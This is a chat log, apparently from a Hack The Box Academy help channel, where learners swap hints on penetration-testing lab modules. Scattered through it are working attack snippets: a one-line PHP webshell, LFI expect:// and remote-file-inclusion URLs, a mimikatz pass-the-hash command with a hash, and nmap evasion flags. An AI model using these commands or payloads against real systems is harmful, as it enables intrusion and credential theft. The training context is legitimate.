#modules
ive tried to use the expect wrapper as they said in the module and it hasnt been working
the server is just fed up "not not them again"
curl -s "server:port/index.php?language=expect://id"
did you replace <id> with an actual value? idk what it's expecting tbh
i haven't done this module myself
well its supposed to be an rce , so id should show me the user's permissions
such as uid, groups etc.. ive tried other commands as well. such as ls, basic stuff really and it doesnt work for me
Haha yup, haven't you heard of that one? Jokes aside, restarting VM did the magic,
for the web part of the course, I'm not sure all of the techniques explained are working.. if i remember correctly, it was not like the other enum, AD sections etc. where we could try all the course content
i mean
it should i guess, it followed the configuration necessary for it to work, and ran it with it and seems like the config was ready for it
with extensions=expect , being set for the expect wrapper to be used. so im baffled
yeah maybe this is just me, i don't know, i remember at the start of that web part, trying to make everything work and spending time on it, to finally realize some things just did not work but i was able to complete the exercises with other techniques from the course.
well i am at that part to be honest 😂 , ive finished the section already used the other wrappers to gain rce, ive did it and it worked fine
just this part hasnt worked and it grinds my gears
yeah, i get that as well,,, i quickly tried here and same results as yours
oh lol
@next bronze it worked, sudo nmap -sUV --disable-arp-ping -Pn -n --source-port 53 -p 53 10.129.2.48 --script dns-nsid
but are there other questions that work like this? i dont wanna use pwnbox, im comfortable with using my host machine
few and far between
hey guys, any hints for the Skills Assessment of Broken Authentication?
How can I trigger a php reverse shell which I have uploaded to a webserver, through a FTP server?
I can access the .php file on the HTTPS site, but when I do so, the webserver serves the file for download and is not running the php code.
call it?
i assume the webapp resources or some of them are stored there, and it calls them from the ftp server, i presume if u go to the directory through the url u might be able to activate the rev shell
then it's likely you either A: placed it in the wrong place or B: don't have the listener running to catch it
c: looking for it in the wrong place? @fathom pendant
ye i noticed
Listener is running and ip is set to tun 0. Ports are matching. Not sure where else to place the revshell other than / as with the other files
that might be useful to place it there at the webroot
Yup but already there
you can also search for vulnerabilities
Me?
i believe the documentation explicitly states C*FTP
look for an idor first and try to maximize the info u got from it to the max, u can use intruder or make a script that goes per user etc, make sure to look thoroughly through all of the users one will stand out.
Something like that - I just find it way out of context considering the material in the room
i dont wanna spoil it for you
sometimes you need to do extra research outside of what htb teaches you
htb teaches you how to also look for info
not just "well it wasn't taught explicitly"
either way FTP isn't the only way forward
but also @stark lark reverse shells aren't always necessary
try just a basic php webshell
<?php system($_GET['c']); ?>
Yes that is what I'm currently trying
well are you specifying .../file.php?c=<command>?
Sorry.. That is what I will try now after the regular php rev shell
stop trying for a rev shell :)
you won't always be able to get a rev shell; and shouldn't be your sole focus
Was just the first thing that came to mind
When I figured I was able to upload and access it through the webserver
you won't know a revshell would work if you can't get a basic webshell to work/test
always start with the basics
"can I get it to run a command?"
also if your revshell syntax is for linux, it's not gonna work
the host is not linux
what were the lessons learned from the previous adventure in brute forcing? : D
This also downloads the shell2.php file
why are you using //?
also:
STOP GOING FOR REVSHELL
i literally gave you a simple webshell syntax
i will say it one more time: REVSHELL NO
wdym?
means it's not often
forgot the ; after the system($_GET[]); btw
i literally already called that out
anyone to help on the Skills Assessment for the module Intro to C2 Operations with Sliver? i know what to do it just wont work idk really know why.
No clue was on laptop so I couldnt see
i mean you didn't look at the url you were trying to access?
So like this?
also: http:// not https://
No clue why, but it seems that the files arent on port 80.. only 443
weird
oh yeah the ftp server is running on https
but yeah the issue is that you need to upload the file to the actual base webserver
as the 443/https is running a fileserver
so it's not going to run the file; just serve it
Hmm not sure if I'm even on the right track then
you're thinking almost correctly; the FTP service though has a glaring vulnerability if you search for it
as I stated though; FTP is only one of the paths forward
what section?
Thought of doing it like this #modules message
Managing Libraries in Python (Continued) last one
that could be a way forward (but make sure you have the \ facing the right way, or doubled up)
the question wants the whole output <class 'type'>
Yup but sucks I wasn't able to do this lab myself..
because you're thinking in only one dimension
let me try
uploading to ftp only uploads to the ftp server
read the docs and see what service is running the FTP server
search that for an exploit
Don't think I've met such before where the ftp server is also https
well most servers now are https
it's just being hosted on an https server for file retrieval
¯\_(ツ)_/¯
it's nothing crazy
usually the ftp server is on a separate server, but they can't set it up that way for these labs
so they separate http/https
Thanks
btw if you print(type(var)) <-- it'll print out the full thing that same way
<class 'type'>
was just guess1ng 😅
you shouldn't be guessing
the section tells you how to get the type of something
none of the modules, as far as I know, require you to guess
it's formatted in a way for you to follow along
Hi
or be within an interactive python env (usually typing python in your terminal)
I just started htb
w1ll try that aga1n
same
you don't need to replace your 'i's with 1s, it's kinda cringe bro
IIs any one named this so i can change if needed
read and follow #welcome so you can access more channels
I named myself this before i joined
when you link your HTB account, it'll change your name to your htb username
this isn't a gen chat
Oh
this chat is for help with academy modules
Oh ok sorry
Gotcha. Should I be able to view the contents of flag.txt through the web shell?
if you upload it to the right place
again
let me spell it out for you
the SERVICE running FTP is vulnerable
Quick what in the world is the clover thing
sorry hav1ng keyboard problem w1th some keys
discord thing denoting "new user"
get a new keyboard
Ah
Yeah
Bro now way same here
hey that's something
no need yet just have to replug just dont have screw now
Mine glitches all the time
Haha yes I know how to follow a guide.. But right now I cannot remember how to do it. I suppose something like more <flag path> but what about spaces etc?
red or blue???
you really don't have to worry about spaces
yes
wh1ch??
Yes?
purple
???????(questions)????????
generally shouldn't be following a guide
matters for us b1gners to stay at s1ngle path
anyway @stark lark the windows find command is where
Thx! Figured the flag was somewhere easy - being the only thing easy for this lab
i suggest doing the intro to windows command line/intro to windows modules if you haven't done them already
usually is
1s there any module for revers1ng at acadmy?
Thanks for the help and patience
Verification not working
message a mod see the members list for who's online
I type it in and says its too short
well are you on https://app.hackthebox.com/profile ?
there's no account identifier for academy
i wasn't gonna say anything since it got autoyeeted
¯\_(ツ)_/¯
Fr my keys repeatedly type on its own
p1ng mod there
well then if you don't know then you didn't read 
My bad
the instructions are literally there in plain english
Lol
congrats! that's curious, i did not get the same flag
Not working
he likely edited it 
I gi e up
skill issue then
Give up
if you can't follow basic instructions
nah it's a you issue
How?
thought about it, but that's well done haha
other people have been able to identify just fine
Ops
Heya. currently working on Information Gathering - Web Edition>DNS Zone Transfers.
first question needs you to do a DNS zone transfer for inlanefreight.htb on a generated DNS, which is the 10.129.118.66 in my command. i basically did the same thing as in the example earlier in the page, but altered
Example: dig axfr @nsztm1.digi.ninja zonetransfer.me
Mine: dig axfr @10.129.118.66 inlanefreight.htb
it then throws this error 3 times and gives up:
;; no servers could be reached
What am i doing wrong?
also, i'm assuming attempting zone transfers on a random DNS is illegal right? or at least not 100% legal
are you connected to the vpn?
ah i didn't know connecting to the vpn was required, will try that. thanks
sees internal/private IP
"Didn't know I needed to connect to VPN"
basic network info goes a long way
yeah fair. honestly didn't pay too much attention to what exactly the IP was. kinda tired and just trying to do one last chapter for the day
10.x.x.x is a private ip range
it doesn't help that a fair bit of this module is mixed public/private IP
information gathering module section web archives
i cannot view the 8th of august on waybackmachine
Bruh
in 2018
Please calm down
Ha I did this earlier today
Did you do hackthebox.eu?
Instead of hackthebox.com
it shouldnt be this difficult to do hackthebox lookup for the wayback
Bro for bug Bounty which box should I consider?
hackthebox wasn't .com back then
oh wait ur right actually
Hehehe
no boxes are gonna reliably help with Bug bounty
as the goal of bug bounties and the goal of boxes are different
You mean i don't get boxes for bb in htb?
I'm confused now!
I thought htb will help for bb not academy
So I brought monthly subscription
Academy and the CBBH track help with BB. If you want more BB stuff on HTB, look at the challenges
Specifically Web, probably
So there's no dedicated boxes for bb in htb right
I need to search for myself? Isn't
i think you're not reading carefully enough:
HTB has challenges - those will be closer to bug bounty than boxes
From there you can also do Portswigger as extra practice
challenges have categories like "web, binex, reversing" to give you a rough idea of the skill needed to get the flag
the goal of boxes, however, is to get full root of a box
Yeah bro I'm getting now
in bug bounty, you don't want root
because getting root == you can be in legal trouble
But the htb box will help a lot for bb right?
lmao
challenges are a separate part of the main platform
The htb.eu is shown in the picture in the course, they couldn’t give a better hint.
habits make you think .com
Where can I get these challenges bro?
yeah my bad on my end but with osint u have to look and read carefully
Thanks a lot bro❤️
Can you give some more info about this?
also verify your account following the instructions in #welcome
this isn't a channel for help with challenges/etc it's for htb academy
if you read and follow #welcome you'll be able to see more channels
In the "Footprinting IPMI" module of the pentester job path it says that we can abuse a flaw in RAKP in IPMI 2.0 to obtain password hashes for any user and crack them offline. It shows an example of using hashcat to crack the mask, and an example of retrieving the hash. Just to be clear, I'd take the hash I got from Metasploit (shown in a red rectangle in screenshot 2) and add it to "ipmi.txt" in the hashcat command (shown in a red rectangle in screenshot 1)?
do you want to an example of how to use hashcat to crack ipmi?
I'm asking if that's what's being demonstrated in the module since the Metasploit module appears to have cracked the hash all on its own any way so I'm not sure what's the need for hashcat.
Did you try with hashcat?
Don't use the mask
The mode is right, but the mask is explicitly for specific circumstances
The sentence with it even says "in the event of HP iLO using factory default"
The example shows it being cracked because the hashed password is in the metasploit wordlist
Otherwise it gives you [user]:[pass]
If user is in the wordlist then it gives a username if not it gives the hashed username
man
Bro what happened
My account's mail was changed, so I deleted it.
But now waiting for mods to unlink the old acc.
yea bro, Mr.K was in friendlist, 0day, szy, alot of staff.
all gone. 😢
Gg no re
?

hey @naive sage
whats up bro has heard that u got scammed by some sk1ds
Anyway not the place for idle chatting
^^^
Hey can anyone help me with the dc sync section in active directory module for cpts
Ive managed to rdp into the attacking machine from a windows box now i try to run secrets dump and all not working
what's the error say
Status locked out too many login attempts
reading tcp/ip illustrated but I wanted something more to supplement my reading.
Whats a good "guide" for modules you should start out with
There's not much to supplement stuff like that as it's stuff that you kinda get baked in your brain
Most stuff in hacking deals at the network/transport layer, with other protocols spanning from session to presentation
Anyone want to see Trumps Shooter death face ?
Not for this server my guy
Read #rules
lol
👌
oh so my book is great enough content wise to be read by itself
thats nice to know
Generally yes
id still like to apply what ive been learning though, or at least interact with it
TCP/IP and OSI are general theory
You don't need to dig into it unless you're a network architect. Aside from that, there's already programs built to interact with other layers
to my original question, where would a beginner start module wise?
Information Security Foundations path
Lays the groundwork for a lot of basic things you'll be expected to know
INFORMATION GATHERING - WEB EDITION
Section: Creepy Crawlies
After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com.
- I crawled the website just like the module taught me.
- I crawled the website using everything; burpsuite crawler, zap spider, & the ReconSpider script demonstrated in the module.
- I checked all URLs found and none of them are the answer or lead to the answer
Thanks for any help
Hey @fathom pendant can u help plz
why would info about future stuff be in a url? perhaps it's hiding in a comment
I checked all urls of the entire site for comments but there is nothing regarding future reports
i found it pretty easy with reconspider
¯\_(ツ)_/¯
https://www.inlanefreight.com/wp-content/uploads/2020/09/goals.pdf
just run reconspider on inlanefreight.com
There is the uploads directory which includes reports such as the company goals in 2020
I did run it though
well you're missing something then
"https://www.inlanefreight.com/index.php/about-us/",
"https://www.inlanefreight.com/index.php/news/",
"https://www.inlanefreight.com/#content",
"https://www.inlanefreight.com/wp-content/uploads/2020/09/goals.pdf",
"https://www.inlanefreight.com/index.php/about-us/#content",
"https://www.inlanefreight.com/index.php/contact/#content",
"https://www.inlanefreight.com/index.php/offices/",
"https://www.themeansar.com",
"https://www.inlanefreight.com/index.php/career/#content",
"https://www.inlanefreight.com/index.php/news/#content",
"https://www.inlanefreight.com/index.php/offices/#content",
"https://www.inlanefreight.com",
"https://www.inlanefreight.com/",
"https://www.inlanefreight.com/index.php/career/",
"https://www.inlanefreight.com/index.php/contact/"
it won't be in links
ReconSpider has a Comments field
cat Results.json | jq -r '.comments'
But mine doesn't
Thank you for that @fathom pendant I found it
you were just looking in the wrong spot
if you get domain admin, means you have local admin right over all computer too?
within the domain
okay thanks
we only need to bypass UAC when we are accessing the target via fully CLI?
I'm hitting a weird problem with the Gitlab section of Attacking Common Applications. Firefox gives me a 422 error when logging in with valid credentials to Gitlab, whereas Chromium logs in fine. There are comments in online forums suggesting that the problem is a lack of _gitlab_session cookie in FireFox. This is a problem with the suggested RCE script as I can't see any way of putting the cookie from Chromium into the script and so I just get a 422 error.
Does anyone have any ideas?
yes
On a technical level, being a domain admin gives you local admin powers on all domain-joined computers by default. it doesn't always grant you "local admin" privileges.
yep that is true, I've seen DA not have admin rights on specific hosts, it depends on the configurations
^ yup. by default yes, but can be configured otherwise.
i see thank you so much
I want to purchase htb academy silver teir subscription, do I buy it on hack the box?
do u have college id or school id?
Im a highschool student so my school isnt registered as eligible for academy tier subscriptions
bro use that id and get 8 dollar plan which covers everything
so what do u have?
you buy it on HTB academy website
but if you message support you can likely see if they can work you in for the student monthly
they've been known to get HS kids the discount
yay i did same
just gotta reach out
Im trying to do so, it doesn't direct me to another site
but ill try messaging support, thanks
?
"it doesn't direct you to another site" not sure what you mean by that lol ofc it won't redirect you off HTB
take it up with support ig ¯\_(ツ)_/¯
only thing I can say is make sure you don't have adblock enabled
god damn it
im guessing thats why the target system wasnt spawning, I tried changing my vpn location to a different region and it ended my system
Im at free tier so It means I cant actually go through the module I was doing
that wouldn't mess with target spawning
just use your own vm
¯\_(ツ)_/¯
if you have your own computer it's worth setting up your own vm
Hello,
I need a nudge with the Skills Assessment - File Upload Attacks Module. I understand that in order to get the full path, I need to figure out how the file I upload is renamed. However, although I am following the logic behind this, it simply does not seem to be working for me.
ill look into how id do that on mac os
UTM or Parallels
those are the best for Mac
parallels is subscription
didn't say free
Havent heard of utm though
im guessing id make 2 vms? 1 with kali and one with whatever
actually id just need 1 as they provide me with a target system free of charge
i still need a windows vm to play steins gate vn, ahem
yeah
but you only need one vm
you don't need to use the instance if you use your own vm
just need the vpn
and you're good to go
Thanks
If still didn't get
DM!
What's special reward when reach 30 streak point every week ?
Hey guys. Im currently going through the nmap module. There are some questions that require us to scan all ports. But whenever I try doing that the scan takes a ridiculous amount of time (>1hr). I checked this using the -v flag. I have tried different vpn servers and all of then results in the same issue. Anyone else experiencing the same thing?
nothing
so far
-T4
and maybe -sT to force it to do a TCP scan
I use nmap -v --min-rate 5000 'IP'
--min-rate 5000: This option sets the minimum packet sending rate to 5000 packets per second. This can speed up the scan but may also increase the likelihood of detection and blocking by firewalls or intrusion detection systems.
How about the firewall and ids/ips evasion hard lab? Ive used that method for one of the earlier tasks but for the hard lab i will get banned
Yeahhh i used that for the earlier one but now in the hard lab i cant really use that method
nmap -sS -p - -n -Pn -g 'IP' --disable-arp-ping
Thanks pal! Already solved it.
I am getting the same result when using the PowerView function Get-DomainTrust and Get-DomainTrustMapping. The reading in the section "Domain Trusts Primer" of module "ACTIVE DIRECTORY ENUMERATION & ATTACKS" shows that Get-DomainTrustMapping gives a little more information. Is there something I am missing or is this the expected behavior?
In this case there's not more info to give
no
not legal
and no one will help
Hey can someone help me with "attacking web application with ffuf - skill assessment" last question parameter value fuzzing .. I already got the parameter to fuzz but not able to find good word list to fuzz the value, I have already tried "xato-net-10-million-username" and got "Hxxxx, xxxxy,xxxxx" .. but when I tried it with curl post request with no further success in obtaining flag.
in win privs kernel exploit, i tried to get met shell but failed, any tips
maybe recheck your curl request, from what you say you seem on the right path
Yes you were right I had a little typo in curl command.. and thanks for your response
nice! maybe delete the command you posted as they contain spoilers
Yeah sure
from just that screenshot as context, i would say try to check why you have those errors.
Hey @south glen I’m at the step where the page should say ‘you dont have access’, i wonder which directory list I need to use for the ffuf wordlist. I’m using directories2.3 small
which CVE are you using?
Do you also encounter problems with htb machines? They are really slow.
Ive tried this and it still says it will take 2hrs using -v 😂
Any hints or resources for this assessment in Network Configuration section at Linux Fundamentals?
Got it success with combined_directories.txt from seclist
Hey
Could someone help me with the web attacks module?
I have found the user, who's administrator with the id 5*, but when I try to change the password I get Access Denied error
And also I tried using web tampering by trying to edit the details on api.php/user/7* but I couldn't change the company name
@left topaz
This part is broken on the target VM.
You need to change the ProcMon executable that Noriben uses so that it can save the CSV properly.
There is a Procmon64.exe file in Noriben-master. Open Noriben.py and scroll down to the config. Change the following so that it points to Procmon64.exe
o
any ideas on how to improve the performance of htb machines? 😄
nope but there shouldn't performance issues generally
which module are you having problems with
Web Enumeration & Exploitation. It takes like 5 min until a web page is loading.
is that a module?
Could someone help me? I’ve already got the IDOR, i changed the request to put, head and patch to reset.php and to api.php/user/**, sending it in the default format and in json and i get a “0” or a “1” in the answer, respectively, as well as “access denied” and “missing parameters”. I would assume that the answer “1” would make the necessary changes to the admin user password, but no, the “1” is just the api answer. Any hint would be much appreciated. Thanks in advance
Attacking Enterprise Networks / Web Enumeration & Exploitation
the point is, that some of the web apps are working fine, but some of them are really slow
I'm on EU, nvm, i will do it like this
Hey can someone help me with "attacking web application with ffuf - skill assessment" Trying to fuzz parameters, hard time on choosing correct wordlist tried burp parameters no luck any other suggestions?
have you got any of the tokens for the users? and enumerated which user id is admin?
Yes
if you have the token for admin, and user id, ||intercept the request and include the admin token in the request.||
I did it says accessed denied
You mean API.php/token/5*?
if you're using the admin token in the header's then it shouldnt
can't find my notes on this one .... but i remember being stuck for a while and ||it was including the token in the header of the reset.php (not just the username) ||that was the piece i was missing, as by default it wasn't include it (and therefore denying).
So you mean in the cookies??
maybe im thinking of a different assessment. but for 1 of them, ||you had to find the UID who was admin, and then find the token. and include that token (was different to the PHPSESSIONID)|| in the reset.php request.
It still doesn't work
Hi, I am doing "Attacking Domain Trusts - Child -> Parent Trusts - from Windows" section from "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module. I am quite unable to grasp the concept of SID Filtering or why is it required.
- Let's say we have domainA (source domain) with userA that needs to be migrated to domainB (destination domain).
- After migration, a new user userB is created in domainB with a new SID and sidHistory set to the SID of userA in domainA.
- When this user tries to access resources of domainA, they get the permission from sidHistory.
This is the desired behavior. Now why do we need SID Filtering? Where should this be enabled, on the source(domainA) or destination(domainB)? If this is enabled, wouldn't it disrupt the migration process?
I would appreciate pointers to reading materials that explain this as well.
The token is something
i used ||burp-parameter-names.txt|| from seclists and ||usernames.txt||
The token from api.php/token/5* ???
Thanks let me try that
no promises lol
i dont feel strong on web stuff. i need to circle back and maybe do some portswigger labs too lol
Another question that I have is, during migration of userA from domainA to domainB, what is the trust relationship like? Which domain trusts whom?
SID filtering is to control which type of SID are allowed and to manage the trust boundary types allowed, it affects more than just migration
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/55fc19f2-55ba-4251-8a6a-103dd7c66280

Considering the scenario of migration, where should this be enabled, on the source(domainA) or destination(domainB)?
the domain with the ex-foreign principal, so the destination
once the domain is migrated the users will get a new SID within the domain they have migrated to
If I understand it correctly, we need to enable SID Filtering on domainB so that even if a user on domainA manages to get the SID of domain admin of domainB, they cannot do anything. But if we enable SID Filtering on domainA, then the just migrated user will not be able to access resources within domainA, which is not the desired behavior. So, we do not enable it on domainA(source).
Bye have a great time
yep, basically with SID filtering, you cannot fake a ticket with the SID of a privileged group (let's say DA with RID of 512/519) of a another trusted domain and obtain DA privileges on the target domain
Could someone help??
which section?
Web attacks
hey, yes maybe, in absolute terms someone could. You already got help. Could you eventually try to be more precise in your questions, modules and section, give context, develop on what you tried, what did not work etc. wrap your command into backticks so it is readable without too much effort.
Here
on web attacks you have multiple sections, like idor, skill assessment etc.
Thanks for the help @sterile solstice
Skills Assessment
There is only one I guess
no problem. was i helpful? haha
try other http verbs, assuming the rest is correct as there is a few parameters that can mess things up
Yeah you were, I am the stupid one
I am still stuck
mate, im there with you. i occasionally get something right. glad i helped a bit though.
just post screenshot of your burp request, you can delete them later
still need help?
you are not stupid, you have to have the correct http verb, endpoint, uid and token. A lot can possibly go wrong or get mixed up
Yes.
I DMed you
i went around in circles with that one. took me ages to figure out how to get the token again once i enumerated the admin's UID lol. it was a 'simple' exercise but not always the easiest ....
It says access denied
yeah i remember it needed to be fairly organized in renaming the repeater tabs,
yup. and i took so long the target died, and when i reset it was all screwy. between burp retaining some cache for prior intercepts and not setting the target to the new IP, i was just having an awful time lol.
haha same here,2h.... not enough but going from start helps with muscle memory though : )
yea i agree! part of why the modules are good, they force you to do and not just read text. but its super annoying when you're doing an assessment and the target dies...it happens too often with me lol
you need to make that UID a spoiler.
why would you do that, how is it helping in revealing everything ?
ok they get the flag but what will they learn
highlight the text and click the eye function. dont want to spoil it for others
just remove the obvious answers
well that too lol
@wraith pelican have you done the attacking common apps module yet? i had issues with the WP section. not doing it tonight but i may need some help tomorrow lol
yeah i've done the cpts path except reporting and aen... and yes glad to help if i can : )
https://academy.hackthebox.com/module/113/section/1100 for wordpress enum & discovery, are you only using wpscan? i never found the flag.txt from any of the enum features i used from wpscan.
it also wouldnt accept the plugin i found as well, which im pretty sure was the answer. spent hours googling and trying and got nothing for 1 of the first sections that has q's lol
Enumerate the host and find a flag.txt flag in an accessible directory. Look into the directories listed by wpscan.
let me check if i got something in my notes
and the plugin name is from 3 words with space between them like "word word word"
yea i thought it was ||contact form 7|| but it wont accept it and i ran wpscan a few times and got nothing
its not contact form 7
just use curl -s http://blog.inlanefreight.local/ | grep plugins
i guess i only used wpscan and manual enum. i see nothing much else in my notes
so that only returns ||contact form 7 and mail-masta ||
only 1 of those is a 3 word plugin which it would not accept as my answer lol
that's not it obviously : D
can you paste the result from curl here?
||```html
<link rel='stylesheet' id='contact-form-7-css' href='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/subscriber.js?ver=5.8' id='subscriber-js-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine-en.js?ver=5.8' id='validation-engine-en-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js?ver=5.8' id='validation-engine-js'></script>
<link rel='stylesheet' id='mm_frontend-css' href='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.8' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2' id='contact-form-7-js'></script>
```||
curl -s http://blog.inlanefreight.local/?p=1 | grep plugins
that was it....
thanks mate. it was such a simple exercise and it just wasnt working for me. it was very annoying. lol
https://academy.hackthebox.com/module/163/section/1544 Any ideas for "Use the XXE vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}). "? I tried i think everything, including a reverse shell, but i can't find the path of the flag.
scanning through that page, that is well above me lol
aen, that's so forbidden, can't help, can't even look at it
I've heard so much about it. I feel like it's going to crush my motivation to get certified lol!
haha yeah reading the cpts channel killed me
yeah, sometimes it motivates me and other times not so much... hahaha
I will likely skim parts of AEN reading, but then go back through the modules from the beginning, and then tackle AEN. Will see.
life is in the way right now so I probably won't get to Attacking Common Apps until later in the week/weekend. Then it's privesc, then AEN, if I remember correctly.
that's what I'm doing at the moment, reviewing all the course, notes, etc., with the impression I should upgrade my hard drive somehow because it seems new data keeps overwriting the old one :D
I just don't understand why it's not working when I try to get a rev shell
haha. Well, fixing my notes is another thing too. Also, when I did a few boxes this week I found myself not having a clear method. I need to work on my workflow. And I know it's not necessary, but even going back to other modules like bash scripting, python for DNS, etc., may help with my automation and help in the CPTS exam, though the InfoSec skill path is assumed knowledge. Will see. I'm 75% through the path but this last 25% looks like it'll take ages.
I go back to foundation modules as well; there is plenty of stuff I forgot I got there. Regarding acquiring a method, I think, for me anyway, a good thing was to let the content rest a bit after finishing. Then now reviewing everything and trying to get a higher-level view makes things less overwhelming.
it says XXE wdym revshell
definitely. Believe it or not, I think the Windows Fundamentals/T1 is something I should go back to.
yeah, I agree. A method just comes with practice and planning. In any workplace, getting a method is often about feeling more comfortable with the subject/material/area and understanding those connections. The modules give us information; they can't tell us how we should go about organising ourselves in a pentest, at least IMO. Doing those boxes helped me a lot though. A bit of practice from the modules.
you can just read the flag file with XXE
yeah, but where is the flag 😄
it will be likely in /flag.txt
the path 😀
yeah, it's not because we read something once that we know it, at least not for me anyway. Plus the question/flag system gives a biased sense of completion. I recently watched this vid about OSINT methodology; it was kinda helpful because on a high level it is the same way of doing things: rinse and repeat, organisation, ask questions, question the questions, etc.
https://youtu.be/FCpJ9fFF84g
In recent years, public interest in open-source intelligence (OSINT) gathering and analysis has increased exponentially. As this interest has grown, more and more OSINT investigations have been relying on tools and automation, leaving the analysis process behind. In this talk, Nico will show why you should consider OSINT a thought process. He wi...
well, I really want to get the OSINT module, even though it's T4. I've done some OSINT previously and as far as specialties go, that's kinda where I want to focus.
there have been some OSINT conferences/forums that I tried to get my company to send me to. They didn't take. B*stards. hahaha. But when I get through more of CPTS I'm going to have a look at that OSINT module.
(thanks for the link. i've saved it to watch later)
haha, same about the OSINT module, it is generally an interesting topic. Also this post by Black Hills Infosec gives a bit of perspective. A 5-year plan into infosec.. 5 years, not 5 months :D
https://www.blackhillsinfosec.com/webcast-5-year-plan-infosec/
probably too much info now for the channel, mind if I DM?
Hi
no, yes DM
Heya. need some help with Information Gathering - Web Edition > Virtual Hosts.
Might be a stupid question, but I'm still very new to this, so go easy on me :)
I think it basically boils down to that i don't really understand what to do with "vHosts needed for these questions: inlanefreight.htb".
the first question is: Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"
I've tried 2 things:
- using gobuster in the same way as the example. The example gives you this:
$ gobuster vhost -u http://<target_IP_address> -w <wordlist_file> --append-domain
which is then used to scan for subdomains for inlanefreight.htb using this wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt (I also have this same wordlist in the same directory). Their example then becomes $ gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
When I try to run this same command in my terminal, it returns the same basic gobuster stuff with an error message instead of the normal output which I expected based on what I saw in the example: Error: error on running gobuster: unable to connect to http://inlanefreight.htb:81/: Get "http://inlanefreight.htb:81/": dial tcp: lookup inlanefreight.htb on 192.168.2.254:53: no such host
- I also tried to solve the question through ZAP's Fuzzer. I noticed that when using the manual request editor it normally changes the Host header back to the IP that was generated for the exercise, but I was able to disable this. When using the fuzzer to try the same wordlist as before to fuzz subdomains in the Host header it also does this though, but I was not able to find the option to disable this. So this didn't work either.
I'm not quite sure where to go from here. What am I doing wrong? I feel like I skipped an important step but have no clue what.
add the hostname to /etc/hosts
If a virtual host does not have a DNS record, you can still access it by modifying the hosts file on your local machine. The hosts file allows you to map a domain name to an IP address manually, bypassing DNS resolution.
oh lmao, why did I not think of that. I even read that line again but I guess it just didn't click
so i just add <generated IP> inlanefreight.htb to the file right?
yes, leave the port out tho
In the File Uploads section, the XXE part under Limited File Uploads, only the first SVG upload actually changes. If I try to upload another, it doesn't update it. Is that a me issue? I have to restart the server, and then it works.
can someone help me figure out why my webshell ain't working
the URL used: view-source:http://10.129.175.24/index.php?language=http://10.10.16.106:8000/shell.php?cmd=whoami
the webshell: <?php system($_GET["cmd"]); ?>
anyone?
well a server restart did the job
Hi please help I am very new here. It is very challenging for me at this moment. Even the OpenVPN is hard to connect. Anyone with a great heart please hear. 😦
I am in Windows Event Logs & Finding Evil - at the endpart i need to RDp to the target. I tried many things but it really does not connect.
please help 😦
hey, can you post the command you tried to rdp to the target? What error message do you have?
These are some of the errors in the log. Before it was only one but now it has multiplied. (congrats to me)
so basically why I did that is because the lab says to RDP to the target. So for me to do that (this is what I believe I should do, or maybe I'm wrong), I downloaded the .ovpn file then installed an OpenVPN client. Tried to run it but I got some errors. I did lots of things already but it is not working properly.
ok ok, maybe let's start at the beginning: are you using your own virtual machine or the pwnbox? Or your usual computer?
maybe, if you haven't done it, a good thing could be to start with the basic modules like "Information Security Foundations"path
Hi, I am doing the
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Windows
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
I have RDP'd into the ACADEMY-EA-DC02 machine as user htb-student_adm, which belongs to the LOGISTICS\Domain Admins group. So, I am trying to perform DCSync to get the NT hash of the krbtgt service account. But I get the following error:
are you running it as admin?
Oooooh
Is the server down for some reason
seems like it, i just tried again and its back up? for me at least
When running "PowerShell as Admin", it's working. What I don't understand is we are opening PowerShell in the context of the htb-student_adm user who already belongs to the Domain Admins group, so why is the error being thrown? I mean the user is already an administrator.
UAC: admin users have 2 tokens, one is the standard token, the other is the privileged token. When you run as admin and that prompt pops up, it's using the privileged token
Hey, why can’t I access the platform?
I can access academy but not normal HTB
Academy or Main Platform?
app.
I can't access academy either :/
In the previous section on DCSync, it shows that we can use runas. I tried to do runas, which opens a new session at C:\Windows\system32. But even that gives the same error, why?
I'm in now, he needs me to verify all the time
If you have suggestions for improvement, use /feedback
✅
runas is still restricted by UAC
Are there any players from other regions? Every time I connect to VPN or VNC, it is very laggy. I would like to ask you for your solution.
Just finished the skill assessment for ADCS Attacks but there's something I'm not sure about, can I DM anyone for an explanation?
sure
@next bronze just to update: I just did the WSUS section on EU-6
yep did it too, finally finished the module
US servers are patched as well now 🙂
After the TGT of the hacker user gets loaded into memory, I can directly access the C$ share to get the flag. I also get the NT hash of the lab_adm user, and when I try to perform Pass-The-Hash as follows, I get the error, why?
```
.\mimikatz.exe privilege::debug "sekurlsa::pth /user:lab_adm /rc4:663715a1a8b957e8e9943cc98ea451b6 /domain:inlanefreight.local /run:cmd.exe" exit
```
0x00000005
ERROR_ACCESS_DENIED
Access is denied.
are you running it as admin?
Do you have bullet echo hack?
With PowerShell running with administrative privileges, I get another error
I'm doing this module: https://academy.hackthebox.com/module/54/section/485
But I didn't get a result. Do you know why?
```
┌──(kojin㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://94.237.53.157:54182/FUZZ
```
from my view there are very few reasons that you'd want to PtH in Windows once you've got a hash; doing it remotely or using RDP would be way cleaner
how can I do that?
In the Password Attacks module Pass The Hash section, I know mimikatz or Invoke-TheHash to perform Pth
Intro to C2 with Sliver- Kerberos Attacks
https://academy.hackthebox.com/module/241/section/2692
